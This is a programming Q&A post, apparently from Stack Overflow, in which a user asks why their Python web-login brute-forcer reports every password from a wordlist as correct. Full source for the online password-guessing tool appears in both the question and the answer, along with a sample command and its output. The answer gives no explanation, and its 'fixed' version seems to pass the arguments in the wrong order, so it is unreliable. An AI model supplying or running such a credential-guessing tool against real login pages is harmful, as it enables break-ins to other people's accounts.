# Python password cracking code makes false positive on every password

Tags: python, bash

When I run the command program thinks that every password is correct, but it should be thinking like that only if it doesnt sees on 'Invalid Login Details' on the website.
How to fix it?

I have been trying to figure it out but I dont see anything maybe you will see.

[Link](https://github.com/LudwikZimmenhof/password-cracking/blob/main/cracking%20program/script.py) to github respo when it used to work:

Command:

```
python3 script.py https://cracking.dresperanto.repl.co/logout.php admin passes.txt Login Username?Password?Submit 'Invalid Login Details'
```

Output:

```
[ludwik@ludwik cracking program]$ python3 script.py https://cracking.dresperanto.repl.co/logout.php admin passes.txt Login Username?Password?Submit 'Invalid Login Details'
Data correctly loaded!
Data correctly prepared!
[('Username', 'admin', 'Password', 'password1', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'password2', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'password3', 'Submit', 'Login'), ('Username', 'admin', 'Password', '123456', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'ubuntuserver', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'toor', 'Submit', 'Login')]
[ 1/6 ] Sending  ('Username', 'admin', 'Password', 'password1', 'Submit', 'Login') for https://cracking.dresperanto.repl.co/logout.php
Password found!
Login: admin
Password: password1
Do you want to continue scan? (Y/N):
```

Code:

```
import os
import sys
from time import sleep
import requests
from termcolor import cprint, colored
import colorama
colorama.init()

class Cracker():
    def __init__(self, url, file, login, submit, params_names, fail_phrase):
        self.submit = submit
        self.url = url
        self.fail = fail_phrase
        self.file_name = file
        if os.path.exists(file):
            # Read data from file
            self.passes = self.read_data(self.file_name)
            cprint("Data correctly loaded!", "green")
            # print(self.passes)

            self.login = login
            if len(login) == 0:
                cprint("Login not specified!", "red")
                sys.exit()

            # Prepare data to send
            try:
                self.data = []
                for pas in self.passes:
                    self.data.append((params_names[0], self.login, params_names[1], pas, params_names[2], self.submit))
                cprint("Data correctly prepared!", "green")
                print(self.data)


            except IndexError:
                cprint("Params names specified incorrectly", "red")
                sys.exit()

            # Send data to server
            for index, single_data in enumerate(self.data):
                print(" "*100, end="\r")
                print(colored(f"[ {index+1}/{len(self.passes)} ] Sending  {single_data} for {self.url}", "yellow"), end="\r")
                if self.send(self.url, single_data, self.fail):
                    print("")
                    cprint("Password found!", "green")
                    print("Login:", colored(self.login, "blue"))
                    print("Password:", colored(single_data[3], "blue"))
                    ask = input("Do you want to continue scan? (Y/N): ")
                    if ask.upper() == "Y":
                        sys.exit()
            print("")
        else:
            cprint("File could not be found!", "red")
            sys.exit()


    def read_data(self, filename):
        with open(filename, 'r') as f:
            lines = f.read().split('\n')
            return lines

    def send(self, url, data, fail):
        ready_data = {data[0]: data[1], data[2]: data[3], data[4]: data[5]}
        r = requests.post(url=url, data=ready_data)
        if fail in r.text:
            return False
        else:
            return True
# Managing arguments from console
try:
    URL = sys.argv[1]
    LOGIN =  sys.argv[2]
    PASS_FILE = sys.argv[3]
    BUTTON_VALUE = sys.argv[4]
    PARAMAS_NAMES = sys.argv[5].split('?')
    FAIL = (sys.argv[6])
    cracker = Cracker(URL, PASS_FILE, LOGIN, BUTTON_VALUE, (PARAMAS_NAMES[0], PARAMAS_NAMES[1], PARAMAS_NAMES[2]), FAIL)
except IndexError:
    cprint("Usage: python script.py <url> <login> <pass_file> <button_value> <paramas_names, sepersted with '?'> <fail_phrase>", "red")
    sys.exit()
```

Comment: What, specifically, is your question? Questions seeking debugging help (**"why isn't this code working?"**) should include the desired behavior, *a specific problem or error* and *the shortest code necessary* to reproduce it *as formatted text* (not images) **in the question itself**. Questions without **a clear problem statement** are not useful to other readers. The code should be a [mre].

Comment: @MattDMo 
"
When I run the command program thinks that every password is correct, but it should be thinking like that only if it doesnt sees on 'Invalid Login Details' on the website.
"
This is the problem, and question is how to fix it?

Comment: So the Github version is working correctly?

Comment: Yes, but its pritty ugly

Comment: Have you printed out `ready_data` to make sure you're sending what you think you are?  Have you printed the response from `requests.post` to see why you're misdiagnosing things?

Comment: {'Username': 'admin', 'Password': 'password1', 'Submit': 'Login'} | <Response [200]>

Answer (score 0):

Fixed code:

```
import os
import sys
from time import sleep
import requests

class Cracker():
    def __init__(self, url, file, login, submit, params_names, fail_phrase):
        self.submit = submit
        self.url = url
        self.fail = fail_phrase
        self.file_name = file
        if os.path.exists(file):
            # Read data from file
            self.passes = self.read_data(self.file_name)
            print("Data correctly loaded!")
            print(self.passes)

            self.login = login
            if len(login) == 0:
                print("Login not specified!")
                sys.exit()

            # Prepare data to send
            try:
                self.data = []
                for pas in self.passes:
                    self.data.append((params_names[0], self.login, params_names[1], pas, params_names[2], self.submit))
                print("Data correctly prepared!")
                print(self.data)


            except IndexError:
                print("Params names specified incorrectly")
                sys.exit()

            # Send data to server
            for index, single_data in enumerate(self.data):
                print(f"[ {index+1}/{len(self.passes)} ] Sending ", single_data, "for", self.url)
                if self.send(self.url, single_data, self.fail):
                    print("Password found!")
                    print("Login:", self.login)
                    print("Password:", single_data[3])

        else:
            print("File could not be found!")
            sys.exit()


    def read_data(self, filename):
        with open(filename, 'r') as f:
            lines = f.read().split('\n')
            return lines

    def send(self, url, data, fail):
        ready_data = {data[0]: data[1], data[2]: data[3], data[4]: data[5]}
        r = requests.post(url=url, data=ready_data)
        if fail in r.text:
            return False
        else:
            return True

try:
    URL = sys.argv[1]
    PASS = sys.argv[2]
    LOGIN = sys.argv[3]
    BUTTON_VALUE = sys.argv[4]
    PARAMS_NAMES = sys.argv[5].split('?')
    FAIL = sys.argv[6]
    cracker = Cracker(URL, PASS, LOGIN, BUTTON_VALUE, (PARAMS_NAMES[0], PARAMS_NAMES[1], PARAMS_NAMES[2]), FAIL)
except IndexError:
    print("ERROR")
```